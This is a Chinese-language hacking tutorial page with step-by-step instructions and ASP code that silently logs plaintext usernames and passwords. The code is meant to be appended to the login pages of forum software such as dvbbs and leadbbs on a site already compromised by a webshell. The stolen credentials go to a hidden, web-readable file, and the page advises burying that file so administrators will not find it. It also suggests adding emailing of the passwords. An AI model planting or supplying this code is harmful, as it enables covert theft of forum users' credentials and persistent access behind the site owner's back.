手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >用asp记录论坛用户密码(dvbbs,leadbbs等)
用asp记录论坛用户密码(dvbbs,leadbbs等)
摘要:很多人在得到动网的数据库后郁闷不已(呀的,管理员的变态密码让我们的机器跑砸了都没辙)NowWeHaveAnotherMethod!!!!!这...

很多人在得到动网的数据库后郁闷不已(呀的,管理员的变态密码让我们的机器跑砸了都没辙)

NowWeHaveAnotherMethod!!!!!这就是用asp记录明文密码。

用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。

2.将PATH换成web下可访问的路径,如:C:Inetpubwwwroot...Info.txt(info.txt的路径越深越好,防止admin发现)

3.你的webshell必须有权限修改文件且FileSystemObject可用。

4.一段时间后在IE上访问:http://.../Info.txt就可以看到登录过的用户的帐号密码。

5.在IE上输http://.../(whichyourmodified).asp?u=del可一清楚info.txt的内容。

注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。

2.为了防止info.txt过大,我用清空info.txt的方法。

当然你可以新建文件来解决此问题。

iffilesize>200000then

setfile2=fso.OpenTextFile(PATH,2,True)

file2.WriteLine""

file2.close

endif

--------------------------------------------------------------------

<%

dimfso

dimfile

dimfile2

dimfilesize

dimfile3

setfso=server.createobject("Scripting.FileSystemObject")

IfRequest("u")="del"Then

setfile=fso.OpenTextFile(PATH,2,True)

file.WriteLine""

EndIf

Iffso.FileExists("PATH")Then

setfile=fso.OpenTextFile(PATH,8,True)

Else

setfile=fso.CreateTextFile(PATH)

endif

file.WriteLine"Username:"+Request.form("Username")

file.WriteLine"Password:"+Request.form("password")

file.close

setfile3=fso.GetFile(PATH)

filesize=file3.size

iffilesize>200000then

setfile2=fso.OpenTextFile(PATH,2,True)

file2.WriteLine""

file2.close

endif

setfile=nothing

setfile2=nothing

setfilesize=nothing

setfso=nothing

%>

----------------------------------------------------------------------

Byymqsz

E-mail:ymqsz@tom.com

【用asp记录论坛用户密码(dvbbs,leadbbs等)】相关文章:

利用Session欺骗构造最隐蔽的WebShell

Webshell是如何绕过防火墙提升权限的

揭露88red生成htm静态页面企业建站系统漏洞第1/2页

关于9行代码导致系统崩溃的分析整理

黑客之门的魅力:感染与加载(图)

由mysql弱口令取得system权限的实战

小议yxbbs漏洞利用代码

黑客突破防火墙常用的几种技术

2007 10.30动易网站管理系统vote.asp页面存在SQL注入漏洞

关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析

精品推荐
分类导航